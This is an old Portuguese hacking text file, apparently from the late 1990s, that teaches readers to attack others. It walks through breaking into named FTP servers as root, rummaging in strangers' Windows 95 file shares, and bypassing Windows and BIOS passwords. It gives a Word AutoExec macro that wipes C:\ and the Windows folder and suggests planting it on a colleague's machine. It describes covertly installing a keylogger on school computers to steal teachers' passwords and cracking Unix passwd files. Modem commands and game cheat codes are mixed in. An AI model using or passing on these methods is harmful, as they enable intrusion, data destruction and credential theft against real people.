|
COMO
HACKEAR SERVIDORES DE FTP
Para Hackear um Servidor FTP, primeiro vc deve saber o endereco do Host
ou
seu IP, para isto use o IPSCAN, digitando o IP Principal do Host:
Lista de Alguns FTP's
>>> ftp.mandic.com.br
>>> ftp.bestway.com.br
>>> ftp.netscape.com
>>> ftp.angelfire.com
>>> ftp.internetclub.com.br (servidor Hackeado por SeQ MaSsIvE,
WARBLADE(r), Speed, kkkkk e CRAMBLE)....
Let's HaCk !!!
Existem vários Programas de FTP'S, mas se não quiser saber de FTP porra
nenhuma use aquele do DOS !!!
Va ao Prompt e digite FTP, ao aparece o prompt ftp,
digite OPEN, ira abrir um outro Prompt (to), digite o nome do host ou
seu
IP, tipo (to) ftp.mandic.com.br.
Ao conectar ele pedira a senha e o Password, tente usar os passwords UNIX,
(os famosos defaults) se nao der vc deve entrar INVISÍVEL !!!! Mas como
entrar invisível ?!?!?!
Isso e' fácil... no login pressione ENTER, no password pressione novamente...
Ira aparecer o prompt ftp novamente...., ai e' so' digitar:
quote user ftp
quote cwd ~root
quote pass ftp
Pronto, você ja esta lá dentro!!!
Mas tem um porem..., se escrever a mensagem : USER RESTRICTION APLLY,
voce
não esta Hackeando.., pois esta aplicada a proteção..., para isto tente
com
outro user tipo quote cwd ~sys e os outros da lista UNIX....
ATENÇÃO !!!!
Nao tente Hackear usando o user normal de FTP'S, que e login : anonymous
e
password: seu E-Mail, pois vai ser aplicado a proteção....
MEU DEUS, EU ENTREI, E AGORA O QUE FAÇO??????
Ao entrar vc vai estar no Diretório do login, tipo \home\root\,
Dai, para ver a lista de usuarios, voce volta um dir vá para o dir \home\
e cada dir e um usuario,... não tentem pegar as senhas , pois são
Cryptografadas...
Pois a maioria dos users usa a mesma senha login....
Ok... se você não sabe os comandos, ai vai a dica...., se você estiver
no MS-DOS,
digite ? e tecle ENTER em qualquer lugar, pois ira aparecer os comandos...
e ai e s¢ Hackear !!!
OBS: Não fique mais que 5 Min em um servidor, pois ele cacara seu IP,
e seu
login, e vai ser CADEIA !!!
Não responsabilizamos por atos cometidos nos Hosts... o problema e de
quem
HaCkEiA, e não nosso, pois tome muito cuidado, e NUNCA, mas NUNCA apague
NADA !!!!!!!!!
Para sua maior seguranca, utilize uma senha roubada.
INVASAO
POR IP
Alegria de uns, tristeza de outros... na verdade, aqueles que utilizam
a
rede Dial-Up do Win95 para sua coneccao com a internet podem estar correndo
serios riscos, a nao ser, e' claro, que assim conectam-se propositalmente,
com inten‡oes "diversas".
Utilizar-se de uma coneccao PPP do Win95 num provedor de acesso, significa
estar disponibilizando seu computador a todos os usuarios da Net. Mesmo
sem
o compartilhamento de arquivos, existem diversas ferramentas que permitem
a
outra pessoa conectar-se ao seu computador caso voce esteja utilizando
esse
tipo de coneccao.
Conecte-se a Internet utilizando a rede Dial-Up do Win95. Se o seu provedor
nao disponibilizar uma conec‡Æo do tipo PPP, estas dicas nao funcionarao.
Verifique antes, se voce possui os drivers clientes para redes Microsoft.
Caso nao estejam instalados, instale-os atraves do Painel de Controle,
no
icone Redes.
Verifique tambem se o compartilhamento de Arquivos e Impressoras est
instalado.
Se estiver, voce estara sujeito a que outra pessoa conecte-se ao seu
computador simplesmente sabendo seu IP. Se bem que, para aqueles que ja
sabem, existem mil maneiras diferentes de se "burlar" a fraquinha
seguran‡a
do Win95. Para voce poder encontrar outros computadores compartilhados,
vocˆ
deve configurar WINS e LMHOSTS. O WINS e' utilizado para localizar os
computadores com IP fixo. O LMHOSTS, e' acionado automaticamente na procura
de computadores que possuem IP dinamicos.
ATEN€AO : TODOS ESSES ARQUIVOS SE ENCONTRAM NO C:\WINDOWS
Configurar essas opcoes e' simples. Va ao Painel de Controle e abra Rede.
Verifique as propriedades do protocolo TCP/IP. Ali voce encontrara a opcao
para ativar a resolu‡Æo WINS. No caso de vocˆ nao conhecer nenhum servidor
WINS, utilize 204.118.34.6 como primario e 204.118.34.11 como secundario.
Esses servidores sao dos USA, e gratuitos. Caso queira outros enderecos,
utilize um dos mecanismos de busca na Internet.
Para configurar o LMHOSTS, voce precisa criar um arquivo texto simples,
utilizando-se ate mesmo o Bloco de Notas do Windows. O arquivo criado
deve
chamar-se LMHOSTS. E' nesse arquivo que ficarao os endere‡os de IP e os
nomes
dos computadores que voce tera acesso. Para localizar um determinado
computador, voce digita o seu numero de IP e a seguir seu NetBios, na
mesma
linha, separados por um espa‡o.
Se voce executar o programa NBSTSTAT, seguido da op‡Æo -N, voce obtera
essa
lista, com o nome e o IP de seu computador sempre sendo o primeiro da
lista,
seguido das outras maquinas disponiveis, tudo numa janela DOS.
Atrav‚s do Explorer voce podera ver os computadores disponiveis na rede,
dos
quais voce ainda podera utilizar os discos mapeando-os, o que os tornara
unidades de seu computador.
Se voce for muito estupido e ainda nao entendeu, deixa eu explicar em
outra
linguagem:
Utilizando essas configuracoes acima, voce pode, atraves do seu Windows
Explorer, acessar computadores de outras pessoas que nao tem nada a ver
com a historia, o cara pode estar do outro lado do mundo, la na Polonia
ou
nos EUA, por exemplo, ele esta la quietinho, pesquisando paginas ou no
bate-papo, e voce pode mexer e fucar no computador dele como se ele fosse
uma unidade de disco! Isso mesmo! Faz de conta que o computador do cara
seja
uma unidade de disquete, e voce pode mexer, mover, espionar, copiar, e
ate
apagar arquivos do micro dele!
OBS: tome cuidado para nao ser preso!
MACROS
DO WORD
Ainda hoje existe muita gente que so e capaz de abrir o WORD, editar,
negritar, sublinhar e mandar para impressora, muitos, milhares so sabem
mexer no basico mesmo. Eles nem imaginam o que tem por tras deste riquissimo
processador de texto.
Esta materia tem como objetivo fazer desde pequenas ate grandes sacanagens
com usuarios pentelhos.
Software/Versao Abrangida: Microsoft Word, versoes 6 (win3.11) e 7.0 (win95)
O Word possui um arquivo chamado NORMAL.DOT, onde estao todas as configuracoes
padrao do Word. Se por algum motivo este arquivo for deletado, o Word
o cria
automaticamente quando for inicializado.
Niveis de Sacanagem:
Nivel 1..... Apenas uma brincadeira
Nivel 2..... Apenas uma brincadeira de mau gosto
Nivel 3..... Ja nao e' mais uma brincadeira.
Primeiro voce precisa criar uma macro... siga os passos:
Entre no Word, feche a janela de documento, nao deixe nenhum documento
aberto
(ativo), clique em Arquivo(File) depois Macro, coloque no nome da macro
"AutoExec" (obrigatorio) esta macro e' inicializada toda vez
que o Word for
iniciado, depois clique em "Criar", delete as duas linhas que
tiver la
(Sub MAIN e End Sub) e cole a rotina que tem logo mais abaixo.
PS: Existem outras formas e meios de criar uma macro,mas esta e' mais
simples
Nivel 1
O nivel 1 serve para voce se mostrar, falando que entende do Word melhor
do
que ninguem.
Cada vez que o usuario inicia o Word recebera uma mensagem... de alerta
ou
qualquer outro coisa que sair da sua mente. Veja abaixo:
Sub MAIN
MsgBox "Voce e um pentelho! Eu nao irei prosseguir com o sistema",
"Microsoft
Word", 5
MsgBox "Usuario Pirata Detectado", "FATAL ERROR",
16
MsgBox "JAMES BOND 007 ", "007 na estrada Digital",
64
End Sub
Nota: faca tudo isso em uma so linha, e' que aqui nao deu pra colocar
porque
faltou espaco, ok?
Nivel 2
E' para deixar o usuario irritadissimo. No corpo da macro cole este texto
abaixo:
Sub MAIN
ArquivoNovoPadrao
Inserir "James"
ArquivoNovoPadrao
Inserir "Bond"
ArquivoNovoPadrao
Inserir "007"
ArquivoNovoPadrao
Inserir "James Bond 007 Na Estrada digital "
ArquivoNovoPadrao
Inserir "."
ArquivoNovoPadrao
Inserir "."
ArquivoNovoPadrao
Inserir "."
ArquivoNovoPadrao
Inserir "."
ArquivoNovoPadrao
Inserir "."
ArquivoNovoPadrao
Inserir "."
ArquivoNovoPadrao
Inserir "."
ArquivoNovoPadrao
Inserir "."
ArquivoNovoPadrao
Inserir "."
ArquivoNovoPadrao
Inserir "."
ArquivoNovoPadrao
Inserir "."
ArquivoNovoPadrao
Inserir "."
ArquivoNovoPadrao
Inserir "."
ArquivoNovoPadrao
Inserir "."
ArquivoNovoPadrao
Inserir "James Bond 007 Na Estrada digital "
End Sub
Nivel 3
Bom este nivel e pura sacanagem, com ele um simples clicar do mouse, e
tudo
desaparece! Isso mesmo, "DEL *.*" ou apenas os documentos, voce
e quem sabe.
Sub MAIN
Kill "C:\*.*"
Kill "C:\WINDOWS\*.*"
Kill "C:\WINWORD\*.*"
End Sub
Lembre-se de que estes macros sao gravados no arquivo default do word,
ou
seja, no NORMAL.DOT. De este arquivo for deletado, o Word automaticamente
ira criar outro na inicializacao, entao se voce for fazer estas sacanagens
acima, proteja este arquivo, com o comando 'attrib +r'.
Detalhes: Existe uma forma de iniciar o Word, sem que inicialize a macro
'AutoExec' mas nao irei falar, descubra voce mesmo. A macro do word e
uma
ferramenta riquissima, procure fucar. Voce pode fazer estas no seu proprio
computador (se cuide!), salvando sempre no arq. "normal.dot"
depois copie
apenas este arquivo para aquele seu colega/amigo pentelho e saia de perto,
para nao explodir em voce.
LISTÇO
!!!!
para se usar os comandos do MODEM!
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Comando: Resposta:
+++ATQ0 Mostra os resultados do comando.
+++ATQ1 NÆo mostra os resultados dos comandos.
+++ATN0 Desliga o modo de autodetecta‡Æo!
+++ATN1 Liga o modo de autodetecta‡Æo.
+++ATM0 Desliga o speaker do modem!
+++ATM2 Liga o speaker do modem!
+++ATL0 Volume baixo no speaker do modem.
+++ATL2 Volume m‚dio no speaker do modem.
+++ATL3 Volume alto no speaker do modem.
+++ATI(0 AT O 7) Mostra descri‡äes sobre o modem.
+++ATI5 Mostra os n§ armazenados na mem¢ria NVRAM.
+++ATH0 Hang-up
+++ATH1 Tipo o hang-up
+++ATF(0 AO 10) Seleciona uma versÆo para o modem (default=0)
+++ATE0 Desliga o echo, ECHO OFF
+++ATE1 Liga o echo, ECHO ON
+++ATDP Disca no modo pulse
+++ATDS=n Disca o n£mero na mem¢ria NVRAM (n=0-3).
AT&Z(0-3)=(N§) Armazena os n§'s na mem¢ria NVRAM.
ATS3D Serve para conectar atraves do telefone
RISE OF THE TRIAD
Em qualquer momento do jogo, digite estes passwords para se dar bem:
TOOSAD=> god mode
CHOJIN=> you are un-killable
GOTO=> level warp
SIXTOYS=> various useful items
FLYBOY=> enables you to fly
BADTRIP=> for a psychedelic experience ( try it!! )
BOING=> elasto mode
SPEED=> auto run mode, for the lazy
PANIC=> restore yourself to normal
DIMON=> light diminishing on
DIMOFF=> light diminishing off
LONDOM=> fog on
NODNOL=> fog off
GOGATES=> quit!
GOARCH=> teleport strainght to level end
GOTA386=> use 386 mode
LUNGDUNG=>gas mask
86ME=> use 8086 mode ( oh dear !! )
JOHNWOO=> dual pistols
PLUGEM=> MP40 sub-machine gun
VANILLA=> bazooka weapon
HOTTIMES=>heat seeker launcher
FIREBOMB=>fire-bomb weapon
BONES=> flame wall weapon
SEEYA=> hand of god ( try it !! )
OBS: ANTES de digitar os càdigos, digite DIPSTICK.
|
|
Muitas
pessoas confundem Crackear com Hackear, não é a mesma coisa, crackear
é a "arte" de piratear, reconfigurar, modificar algum coisa, já hackear
é a "arte" de "roubar", "pegar emprestada", usar conhecimentos para descobrir
falhas nos sistemas.
Bom, é mais ou menos isso aí, deu para entender né? Agora vamos Crackear
um pouco:
1
- Quebrando o password da Bios
Existem programas que são capazes de descobrir o password da Bios, eles
agem diretamente com o setup do Pc, abaixo estão alguns programas próprios
para "quebrar" password da Bios:
amipsw.com
ami.com
aw.com
amidecod.com
2
- Quebrando o password do Windows
Windows
3.xx: Para "quebrar" o password do Windows 3.xx você
deve apertar "CTRL+ALT+DEL" depois tecle "ENTER" na caixa de verificação,
depois que você passou do password, apague as linha "run=???" e "load=???"
do arquivo "Win.ini" que está dentro do diretório do Windows (pode usar
até mesmo o Notepad ou o Edit do MS-DOS).
Windows
95: Para "quebrar" o password no Windows 95 é quase
do mesmo modo do Windows 3.xx, quando aparecer a caixa de verificação
do password aparecer aperte "CTRL+ALT+DEL", escolha a janela do Password
na lista depois clique em "Finalizar tarefa", depois que passou do password,
apague as linha "run=???" e "load=???" do arquivo "Win.ini" que está dentro
do diretório do Windows (pode usar até mesmo o Notepad ou o Edit do MS-DOS).
3
- Retirando o password da Proteção de Tela
Windows
3.xx: Apague tudo que tiver na área de password do arquivo
"control.ini" que está dentro do diretório do Windows (pode usar até mesmo
o Edit do MS-DOS).
Windows
95: Renomeie todos os arquivos com extensão "pwl" por
um nome qualquer e anote em um papel as alterações feitas para caso ocorra
algum problema.
4
- Quebrando password dos documentos do Word
Para
"quebrar" o password de um documento do Word existem programas feitos
por cracker específicos para isso, veja abaixo:
wfwcd.zip
5
- Quebrando password de arquivos ZIP
Para "quebrar" o password de um arquivo ZIP, você deve usar algum desse
programas abaixo:
zipcrack.zip
(12,3k)
fzc104.zip
6
- Quebrando pasword de arquivos ARJ
Para
"quebrar" o password de um arquivo ARJ, você deve usar algum desses programa
abaixo:
brkarj10.zip
arjb1utg.zip
Acima forma citados métodos usando programas a algumas manhas, agora abaixo
vou descrever um método muito bom:
Você já deve ter percebido que na sua escola existe algum tipo de rede
ligando o computados central, com os computares dos alunos (bom, é assim
aqui), mas essa rede só os professores "mais avançados" tem acesso, devido
existir senhas para entrar. Você já deve te pensado como deve ter documentos
importantes, provas, notas dos alunos, etc nesse computador central, já
imagino se você entrar nele? todo mundo já deve te pensado nisso alguma
vez, bom existe um método de se descobrir essa senha, claro, tem que ter
paciência, não vai ser de um dia para o outro que você vai dá sorte de
conseguir, mas você tem que usar a cabeça (mete THC na mente), vou descrever
mais ou menos como você deve fazer isso, mas cuidado, pense nas conseqüências
antes.
Primeiro você tem que arranjar um desse programas abaixo:
Dos:
keycopy.zip
Windows 95: keytrap.zip
Esse são programas que gravam em um arquivo todas as teclas apertas desde
a execução do mesmo, já deve te sacado o que fazer agora né não, malandro.
Depois de te pego esse arquivo você mete eles em um disquete, descompactado
(claro), e leva ele para a escola no dia que você tiver aquela aula chata
de química que vocês vão para a sala de informática e te que vê aquele
programinha fudido "Hyper tabela periódica"(é esse o daqui), bom... por
enquanto o professor tiver tirando duvidas dos Lamers você aproveita e
mete ele no drive, vai no Prompt do DOS, copia os arquivos do disquete
para o diretório Windows (copy a:\*.* c:\<diretório do windows>),
de preferencia, copia os arquivos do "KeyCopy.zip", para que possa fazer
ele rodar quando o sistema iniciar sem ninguém perceber. Após você ter
copiado o mesmo para o diretório do Windows, vá para a raiz e insira as
seguintes linhas no arquivo "autoexec.bat" (use o Edit do
MS-DOS):
cd\windows
<o
nome do programa que esta no disquete>(acho que é KeyCopy mesmo)
Agora salve o arquivo, saia do prompt e continue fingindo que está super
interessado na matéria. Você tem que fazer isso no máximo em 1 minuto,
para que ninguém perceba. Quando você voltar lá de novo, você pega o mesmo
computador que você "crackeou", vá no diretório Windows de novo (via DOS)
e copie o arquivo que o programa gravou as informações para o disquete
(veja no "manual" do programa em que arquivo ele grava as teclas digitadas),
depois disso na sua casa você vê com calma o arquivo e vê se tudo que
foi gravado e procura alguma coisa a ver com senha, a se você chegou até
aqui o resto é moleza... mas cuidado, seja discreto quando for pegar informações
do computador central. |
|
Passwd
Você
já deve ter muito ouvido falar do passwd. Ele é o arquivo que contém as
senhas do servidor Linux. Fica no diretório /etc. Vale lembrar, que em
alguns casos, apesar de haver o arquivo passwd, as senhas encontra-se
no arquivo shadow. Bem, tanto faz, qual seja o arquivo que você conseguiu.
Se você entrou em um sistema e conseguiu capturar o arquivo de senhas,
já basta. Abra-o no bloco de notas e veja-o. Se estiver mais ou menos
assim:
root:Jhknnajhg86JJaa:0:0:root:/root:/bin/bash
isso
significa que o arquivo contém a senha e você poderá crackeá-lo. Mas se
estiver assim:
root:x:0:0:root:/root:/bin/bash
você
não poderá crackeá-lo pois o arquivo não está com a senha.
Bem,
estando com o arquivo certo, para você crackeá-lo, você precisará de um
crack e uma lista de palavras(WordList). O programa que usaremos é o
Force Brute.
Ele roda em DOS.
Baixe
o Force Brute, descompacte-o e copie para o c:\.
Para
criar a lista de palavras, baixe o WordList. Crie uma
lista de palavras e copie esta lista para c:\.
Copie
o arquivo de senhas também para o c:\.
Agora
vá ao DOS e digite brute passwd @dict.txt
Fazendo
isso, o Force Brute verificar a senha do arquivo passwd que está criptografada,
pegará palavra por palavra do arquivo dict.txt(wordlist), e irá criptografar
uma por uma, e comparar com as do arquivo passwd. Quando ele achar a senha,
aparecerá uma mensagem dizendo o login e a senha achada que ele pertence.
|